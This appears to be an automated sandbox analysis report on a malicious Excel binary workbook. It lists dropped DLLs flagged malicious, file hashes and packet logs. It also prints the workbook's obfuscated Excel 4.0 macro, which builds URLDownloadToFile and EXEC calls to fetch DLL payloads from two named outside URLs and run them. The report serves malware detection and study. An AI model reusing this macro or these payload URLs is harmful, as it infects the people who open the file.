                                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\user\gihi1.dll
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):302512
                                                                                                                                                              Entropy (8bit):0.011582753180433458
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:WlWUqt/vllXl+YZcFTS9gXeF+X32ZpbYtfhZ8hZy+FAv73A/Ol9qnErqDlblthtg:idq2Vg3F+X322ChMQAjQObV66DTyi8G
                                                                                                                                                              MD5:593AD3F06697E915B547987B0E753705
                                                                                                                                                              SHA1:A855AC5D2979AA4782D21B0E8F731AB4ACC56E30
                                                                                                                                                              SHA-256:E2A91304AE5407AE1FC1FD8E4D670543F4191B4A858E4DB13516FFDA1239B421
                                                                                                                                                              SHA-512:39B85662AA13A582987668954A6F8A14755357F00648406282CD8E2DEBB7045E109DBF4E77EB646D7684F4E2657A11F7D9FC64FAA262B4E5E12D331E210BD815
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\gihi2.dll
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):302521
                                                                                                                                                              Entropy (8bit):0.011582436694389499
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:WlWUqt/vllXl+YZcFTS9gXeF+X32ZpbYtfhZ8hZy+FAv73A/Ol9qnErqDlblthtg:idq2Vg3F+X322ChMQAjQObV66DTyi8G
                                                                                                                                                              MD5:57692E0E3077E0016A5038DD174CFD4C
                                                                                                                                                              SHA1:B999DB831EB947D8CAABFDBB00F6BA1CFEFE3697
                                                                                                                                                              SHA-256:B737EBBBF7E6380296E2DF93A6545C528B9B63579124D16EBDB630BC9085F391
                                                                                                                                                              SHA-512:ABB81617B8D80BAFFCE47B1033CD625C3252A427BDE374FE6B01B4EE5B0CA8BB996F8B16BB99E800314BDEF575E046C01D033C57A113E4C5AE7F7F8DC343606E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                                              Entropy (8bit):7.836349486539577
                                                                                                                                                              TrID:
                                                                                                                                                              • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                              • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                              File name:plan-1053707320.xlsb
                                                                                                                                                              File size:90078
                                                                                                                                                              MD5:4854b4dcfa441032f2f54bf2834e894f
                                                                                                                                                              SHA1:fa24422834d0f6ce6d3e35a8b0f15a906cdf9823
                                                                                                                                                              SHA256:68741c1f5df351dc186805c2c30a79653fd52ce21e2fb2aa34ff0687120343cf
                                                                                                                                                              SHA512:a51e5f92409f4f5dc564c26b2b95659865ae56cf643ea5bb846cbac56a760374aa16cdb7972819e2a3c816632c2e1834ea65be2848f0a8140ac67eb119125a87
                                                                                                                                                              SSDEEP:1536:OlHoxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncjv0/Ci:WDbr0o45GUgHhX8jC9ySa
                                                                                                                                                              File Content Preview:PK..........!..#..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OpenXML
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "plan-1053707320.xlsb"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:
                                                                                                                                                              Application Name:
                                                                                                                                                              Encrypted Document:
                                                                                                                                                              Contains Word Document Stream:
                                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:

                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\gihi1.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\gihi2.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""https://carpascapital.com/gBPg8MtsGbv/ka.html""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""https://gruasphenbogota.com/C74hwGGxi/ka.html""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URLDow,CC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nload,BB,,"=FORMULA(before.2.0.0.sheet!BG27&before.2.0.0.sheet!BG28&before.2.0.0.sheet!BG29,before.2.0.0.sheet!BL47)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,To,,,"=FORMULA(before.2.0.0.sheet!BG11&before.2.0.0.sheet!BG12&before.2.0.0.sheet!BG13&before.2.0.0.sheet!BG14&before.2.0.0.sheet!BG15,before.2.0.0.sheet!BL48)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""rsthYFGIPUYiugeA"",2)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,"=FORMULA.ARRAY(BH10&BH11&BH12,before.2.0.0.sheet!BL49)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CALL,,"=FORMULA.ARRAY(BG33&BG34&BG35&BG36&BG37&BG38&BG39&""2 "",before.2.0.0.sheet!BO52)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG5&BH34&BH37&BH34&BG2&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ47)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URL,,,"=FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG6&BH34&BH37&BH34&BG3&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ48)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA(BI32&BI33&BI34&BI35,BL50)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",E,"=FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG2&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ49)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""","(""",X,"=FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG3&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ50)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,"""",E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,&,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,g,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                              Network Behavior

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 24, 2021 20:51:59.217113972 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.377705097 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.377835989 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.379231930 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.538777113 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.539464951 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.539510012 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.539547920 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.539551973 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.539576054 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.539585114 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.539587975 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.539633989 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.543297052 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.543401957 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.557400942 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.718678951 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.718889952 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.720052004 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:51:59.919806957 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092456102 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092489004 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092503071 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092514992 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092526913 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092542887 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092556000 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.092711926 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.092761993 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.099214077 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.099251032 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.099267960 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.099363089 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.099389076 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.252315044 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252347946 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252360106 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252372026 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252382994 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252393961 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252404928 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252420902 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252438068 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252453089 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.252568007 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.252621889 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.255255938 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.255274057 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.255336046 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.255348921 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.255364895 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.255384922 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.255412102 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.258919001 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.258943081 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.258958101 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.258976936 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.258995056 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.259011030 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.259028912 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.259057999 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.412481070 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.412552118 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.412627935 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.412689924 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.412777901 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.412841082 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.412923098 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.412935972 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.412986040 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413019896 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413079023 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413091898 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413134098 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413151026 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413222075 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413229942 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413301945 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413311005 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413341999 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413376093 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413404942 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413430929 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413467884 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413480997 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413530111 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413543940 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413600922 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413604021 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413639069 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413651943 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413707972 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.413707972 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.413758993 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.414885998 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.414962053 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.414998055 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.415028095 CEST4434973950.116.92.246192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.415061951 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.415092945 CEST4434973950.116.92.246192.168.2.4

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 24, 2021 20:51:43.108686924 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:43.164299965 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:43.291013956 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:43.339402914 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:44.854713917 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:44.905534983 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:45.962810993 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:46.008990049 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:47.614975929 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:47.678334951 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:48.845629930 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:48.894089937 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:53.948920965 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:53.994982958 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:55.259759903 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:55.312151909 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:55.549280882 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:55.644603968 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:56.056659937 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:56.138300896 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:57.124969006 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:57.188456059 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:58.166435957 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:58.252995968 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.018085957 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:59.214350939 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:51:59.314043045 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:51:59.363338947 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.163207054 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:00.226448059 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.521651983 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:00.571331024 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:00.620779991 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:00.675678015 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:01.676764965 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:01.723256111 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:02.776541948 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:02.831732988 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:03.920672894 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:03.975586891 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:04.210329056 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:04.274136066 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:05.052500963 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:05.107897043 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:08.568717957 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:08.614689112 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:11.673342943 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:11.728395939 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:13.500967026 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:13.566433907 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:13.943001032 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:14.002213001 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:15.081157923 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:15.127470016 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:17.645714998 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:17.709813118 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:25.519717932 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:25.575562954 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:35.439935923 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:35.574704885 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:36.154279947 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:36.307291031 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:36.526988029 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:36.591212988 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:37.024379015 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:37.081214905 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                              Jun 24, 2021 20:52:37.154571056 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                              Jun 24, 2021 20:52:37.221306086 CEST53624208.8.8.8192.168.2.4
